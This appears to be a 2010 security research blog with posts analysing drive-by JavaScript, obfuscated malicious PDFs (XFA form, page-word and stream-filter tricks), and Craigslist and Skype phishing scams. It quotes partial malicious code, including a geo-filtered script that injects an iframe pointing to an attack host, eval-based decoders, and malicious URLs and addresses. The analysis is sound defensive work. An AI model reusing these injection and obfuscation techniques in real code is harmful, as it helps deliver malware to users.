blog
December 15, 2010
Attackers have often targeted specific geographical regions, or, conversely, spared certain regions from their attacks. A recent example is the following JavaScript found on a malicious web page:
var s, siteUrl, tmpdomain;
var arydomain = new Array(".gov.cn",".edu.cn");
s = document.location + "";
siteUrl=s.substring(7, s.indexOf('/',7));
tmpdomain = 0;
for(var i = 0; i < arydomain.length; i++) {
if(siteUrl.indexOf(arydomain[i]) > -1){
tmpdomain = 1;
break;
}
}
if(tmpdomain == 0) {
document.writeln("<iframe src=http://ggggasz.8866.org:8843/GwN2/index.html?1 width=100 height=0></iframe>");
}
The code checks the location of the current document. If the domain
does not contain the strings .gov.cn or .edu.cn, then the attack is
launched (by dynamically creating an iframe tag), otherwise the script
performs no action.
Certainly not new, but still interesting...
December 11, 2010
Another interesting attack that targets Craigslist users. I've just received an email with the following content:
Is this your item? It has the same description/pics. Please check it: http://sfbay.craigslist.org/1153605583.html
Thank you.
Needless to say, the link in the email does not point to craigslist.org, but to http://031e0e2.netsolhost.com/?check=item-id-1153605583.html. If you visit this page, you are presented with a simple phishing page for Craigslist:
It was surely a throw-away address, but as a reference, the original sender of the phishing email was brathwaite800345@gmail.com.
Stay away from this guy and this site...
November 15, 2010
Another trick that is becoming more and more common in malicious PDF files consists of storing the actual malicious content (for example, JavaScript code that exploits some vulnerability) into XFA forms. If you remember the getPageNthWord, getAnnots, and the info tricks that have been documented earlier, you will recognize the technique been used here.
So, what is an XFA form? XFA stands for XML Forms Architecture and it is a specification used to create form templates (forms that can be filled in by a user) and to process them (for example, validate their contents). Support for XFA forms in PDF files has been introduced by Adobe with PDF 1.5. If you want to know all the gory details, you can refer to the original XFA proposal or to the Adobe's XFA specification, which, however, being 1123-page long may be a hard read.
Let's see how it used abused in practice (the MD5 of the sample I'm analyzing is 1f26dcd4520a6965a42cefa4c7641334). The PDF first defines an XFA template, which is used to describe the appearance and interactive characteristics of the form.
obj 10 0
<<
/Type /EmbeddedFile
/Length 618
/Filter /FlateDecode
>>
stream
<template xmlns="http://www.xfa.org/schema/xfa-template/2.5/">
<subform layout="tb" locale="en_US" name="artsLei">
<pageSet>
<pageArea id="leiArts" name="leiArts">
<contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/>
<medium long="792pt" short="612pt" stock="default"/>
</pageArea>
</pageSet>
<subform h="756pt" w="576pt " name="docTaut">
<field h="65mm" name="docArts" w="85mm" x="53.6501mm" y="88.649 9mm">
<event activity="initialize" name="tautDoc">
<script contentType="application/x-javascript">
var nil = (function(){return this;}).call(null);
...
eval_ref(decode(docArts[\'ra\'+ue+\'wVa\'+ue+\' lue\'].substring(50),eval_ref));
</script>
</event>
<ui><imageEdit/></ui>
</field>
</subform>
</subform>
</template>
endstream
endobj
A couple of interesting parts: the template defines a field, named
docArts. Note that a reference to this field will be available through
an object named docArts in the global scope of JavaScript (i.e.,
this.docArts is a Field object that represents this field).
The field also has an event handler to handle its initialization. The
handler is written in JavaScript and has the familiar aspect of
obfuscated code.
Let's see what this code does:
var nil = (function(){return this;}).call(null);
var eval_ref = nil['eval'];
function decode(str, ev){
var ret = '';
var cvc = [];
var fcc = String.fromCharCode;
var k = docArts['rawValue'].substring(0, 50);
...
return ret;
}
eval_ref(decode(docArts['rawValue'].substring(50), eval_ref));
The interesting bits here are the references to the docArts object.
Notice that its rawValue property is retrieved. So, where is the value
of the field stored? In an XFA dataset:
obj 12 0
<<
/Filter /FlateDecode
/Length 3388
/Type /EmbeddedFile
>>
stream
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<xfa:data>
<artsLei>
<docArts>
[[32,48],[65,97],[48,64],[10,11],[13,14],[97,126]]
[80,87,70,83,71,77,80,88,16,
...
78,66,74,79,21,86,79,68,8,9,59]
</docArts>
</artsLei>
</xfa:data>
</xfa:datasets>
endstream
endobj
Therefore, the obfuscated JavaScript extracts the data stored for the docArts field (precisely, all the content after the initial 50 characters) and passes it for decoding to the decoding routine. The decoding routine also uses the docArts data (the first 50 characters) to retrieve the malicious code in the clear, which is ready to be evaluated. The execution finally results with an exploitation of the CVE-2010-0188 vulnerability (libTiff overflow).
November 14, 2010
Here is another small trick that malicious PDFs use. The PDF contains JavaScript code similar to the following:
var part1="pe";
var part2="Ty";
var part3="o";
var part4="get";
var part5="xOf";
var fun1= event["tar"+part4]["z"+part3+part3+"m"+part2+part1];
fun1 = varka_tipo[1]+"nde"+part5;
var fun2 = "fromCharCode";
var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" +
"abcdefghijklmnopqrstuvwxyz" +
"0123456789"+
"+/=";
function decode(input) {
...
enc1 = keyStr[fun1](input.charAt(i++));
...
}
var code = decode("Q2!#$%^&5a...#$%^&o=!#$%^&");
eval(code);
This script sets up some variables that are used in a decoding routine. As usual, the routine decodes a long string and the result is then interpreted via eval().
The interesting part is how fun1 is computed. Undoing the simple
obfuscation shows that it is initialized to event.target.zoomType.
Now, event.target is a reference to the Doc object. The Doc object's
property zoomType contains the current zoom type of the document. The
documentation lists 7 possible values:
Adobe Reader seems to return FitWidth by default.
The next step in the script extracts the second character from the zoom
type string (the letter i) and concatenates to other strings to obtain
indexOf.
A long way to get an i...
September 15, 2010
I have been hit by what appears to be yet another round of Skype spam. As it happened before, also this attack seems to be related to fake AV scams.
Here is a screenshot of a contact request I've received today from some notific.alrm.us.13.

The full text of the contact request leaves few doubts to the intents of the request:
This is an urgent Security Center Message ! Please click on "Add to Contacts" and follow instructions to update your system ! After adding contact, go to "Conversations" tab, read and follow instructions !
WINDOWS REQUIRES IMMEDIATE ATTENTION URGENT SYSTEM SCAN NOTIFICATION ! PLEASE READ CAREFULLY !!
http://www.updatedp.com/
For the link to become active, type it in manually into your web browser !
FULL DETAILS OF SCAN RESULT BELOW
WINDOWS REQUIRES IMMEDIATE ATTENTION
ATTENTION ! Security Center has detected malware on your computer !
Affected Software:
Microsoft Windows 7 Microsoft Windows Vista Microsoft Windows XP Microsoft Windows Server 2003
Impact of Vulnerability: Remote Code Execution / Virus Infection / Unexpected shutdowns
Recommendation: Users running vulnerable version should install a repair utility immediately
Your system IS affected, download the patch from the address below ! Failure to do so may result in severe computer malfunction.
http://www.updatedp.com/
For the link to become active, type it in manually into your web browser!
The advertised domain, www.updatedp.com, currently serves me the
default It works! page of Apache. Interestingly, that domain has quite
a long history of maliciousness (at least all the way back to
2003!)
The following usernames are also likely to be involved in this scam:
July 2, 2010
I've just being targeted by an interesting malware attack on Craigslist. The attack works as follows. I am a legitimate user of Craigslist and I have just posted an announcement to sell an item. A few hours later, I receive an email asking:
u still offer?
I reply back back that the item is still available and again after a few hours I get the following email:
Thank you for getting back to me.
I just want to make sure i am going to buy the same which i am looking for.
I can't afford another mistake as i did in the past.
Please check the video and confirm that it's the same u have.
http://fav-vid.com/playvideo.php?video=jgahnYYNPe0
If its the same one I will be there today to buy it
Thanks
Mmmh, fairly generic message (no reference to the actual item I'm
selling) and a "vid" link... Smells phishy. Just to be sure, I follow
the link and after a few redirects I wind up on
http://favvids.net/playvideo.php?video=jgahnYYNPe0&feature=youtube_gdata&name=my_stuff
The picture above shows a screenshot of this site.
Notice the fake notification bar on the top that resembles the one used
by Internet Explorer. Of course, it turns out that we need a "player",
the FLVDirect Player, to
actually watch the video. Sounds familiar...
If I try to download the player, I am redirected to another site,
www.flvpro.com, which finally sends the binary.
The binary has fairly high detection on
VirusTotal (12/41 at this time).
Another curiosity: if one arrives on the site referenced in the email
with JavaScript disabled and attempts to download the player, he gets
redirected to www.thislinkhasbeendisabled.com, which laconically
announces:
This link has been disabled
It was surely a throw-away address, but as a reference, the original sender on Craigslist was allenekf6dok3z@aim.com.
Stay away from this guy and these sites...
May 12, 2010
If the Twitter accept bug of a couple of days ago really was caused by in-band signaling (and there seems to be few, if any, other reasonable explanations for it), then one has to wonder if we will ever learn from past history.
In-band signaling (mixing control and data on the same communication channel) is famous for being hard to get right and to have caused quite a few security fails in a lot of different domains. Just to list a few well-known cases:
printf and the likes mixes data and control; I'll close with the mandatory reference to Bell's corollary:
Those who cannot remember the past are condemned to repeat it
-- George Santayana
Possibly with a handicap
-- Bell
April 28, 2010
Tomorrow, I'm going to present our paper Detection and Analysis of Drive-by-Download Attacks and Malicious JavaScript Code at the WWW conference. The paper describes some of the techniques that we use to detect and analyze web pages that perform drive-by-download attacks, such as the ones that we analyze via Wepawet.
Here is the abstract:
JavaScript is a browser scripting language that allows developers to create sophisticated client-side interfaces for web applications. However, JavaScript code is also used to carry out attacks against the user's browser and its extensions. These attacks usually result in the download of additional malware that takes complete control of the victim's platform, and are, therefore, called "drive-by downloads." Unfortunately, the dynamic nature of the JavaScript language and its tight integration with the browser make it difficult to detect and block malicious JavaScript code.
This paper presents a novel approach to the detection and analysis of malicious JavaScript code. Our approach combines anomaly detection with emulation to automatically identify malicious JavaScript code and to support its analysis. We developed a system that uses a number of features and machine-learning techniques to establish the characteristics of normal JavaScript code. Then, during detection, the system is able to identify anomalous JavaScript code by emulating its behavior and comparing it to the established profiles. In addition to identifying malicious code, the system is able to support the analysis of obfuscated code and to generate detection signatures for signature-based systems. The system has been made publicly available and has been used by thousands of analysts.
See you in Raleigh!
February 22, 2010
Another simple trick that is often used by malicious PDF files consists of embedding the malicious JavaScript code in a PDF stream hidden below several stream filters.
Here is an example:
4 0 obj
<<
/Length 2839
/Filter [ /ASCIIHexDecode
/LZWDecode
/ASCII85Decode
/RunLengthDecode
/FlateDecode ]
>>stream
80124E6422E89C7A3517958CC302316CDE
...
08220861102A8595D813C3187E07C40400>
endstream
endobj
The stream's contents are decoded applying the specified 5 filters in
order (ASCIIHexDecode, LZWDecode, ASCII85Decode,
RunLengthDecode, and FlateDecode).
See this Wepawet report to find out what happens after the decoding is done. These malicious PDFs seem to also have decent detection on VirusTotal (6/41, at the time of writing).
February 18, 2010
PDF exploits are becoming more and more sophisticated. In particular, they often rely on creative techniques to avoid detection and slow analysis. For a couple of examples, see Julia Wolf's and Daniel Wesemann's nice analysis of malicious documents that use the getAnnots and info tricks, where the actual malicious content is stored as annotations or as part of the document metadata (e.g., the author name).
Here is another trick that showed up recently. I'll call it the getPageNthWord trick, from the key API function it uses.
The PDF contains a JavaScript section with the following code (simplified a little):
var s = '';
new Function(decode(2, 35))();
function decode(page, xor){
var l = this.getPageNumWords(2);
for(var i = 0; i < l; i++){
word = this.getPageNthWord(page, i);
var c = word.substr(word.length- 2, 2);
var p = unescape("%"+ c).charCodeAt(0);
s += String.fromCharCode(p ^ xor);
}
return s;
}
This code creates an anonymous function, sets its body to the return
value of the decode function, and then executes it.
The interesting part is in the decode function. This function gets the
number of words contained in the third page of the document via the
getPageNumWords function (recall that pages are 0-based in the PDF
API). It then loops through all the words in that page (via the
getPageNthWord function) and manipulates them. Let's see how the third
page looks like:
11 0 obj
<<
/Length 23892
>>
stream
2 J
0.57 w
BT /F2 1.00 Tf ET
0.196 G
BT 31.19 806.15 Td ( kh29 kh2a kh55
...
kh4e kh46 kh0a kh03 kh58 kh2e kh29) Tj ET
...
endstream
endobj
The page is stored as a stream. Its contents comprise a number of
directives and the actual textual content. For example, BT indicates
the beginning of the text and, conversely, ET marks the end of the
text; 31.19 806.15 Td specifies the position of the text on the page;
and Tj is the display text operator. The actual textual content is
the string starting with kh29.
We can now go back to our decode routine. It is clear that it extracts the last
2 characters from each word (e.g., “29” from “kh29”),
interprets them as hex numbers (e.g, 0x29), xors them with 35 (e.g., 0x29 ^ 35
= 10), and finally obtains the corresponding character (e.g., “\n”).
The result of this deobfuscation is the actual exploit code, which targets 4 different vulnerabilities. However, the exploit code has one last trick, which it uses to hide the URL from where the malware is to be downloaded:
var src_table = "abcd...&=%";
var dest_table= "eAFS...=iZR-";
function get_url(){
var str = this.info.author;
var ret = encode_str(str, dest_table, src_table);
return ret;
};
Notice the info.author property. The get_url function essentially
performs a simple substitution decryption of the author metadata. Let's
see what is contained there:
17 0 obj
<<
/Author
(-Jj.gw-Jjrj.-JWMyD-JjTWM-JjngM-JgkjW
...
-JjrWk-Jjrgw-JgTyM-Jy0g.-JWgyg-Jgngw-JgYgY-JyygM-Jy.yC)
>>
endobj
Ugly, indeed. After decoding, one finally gets the malware URL.
Wepawet now handles this type of malicious PDF files. See this report for an example.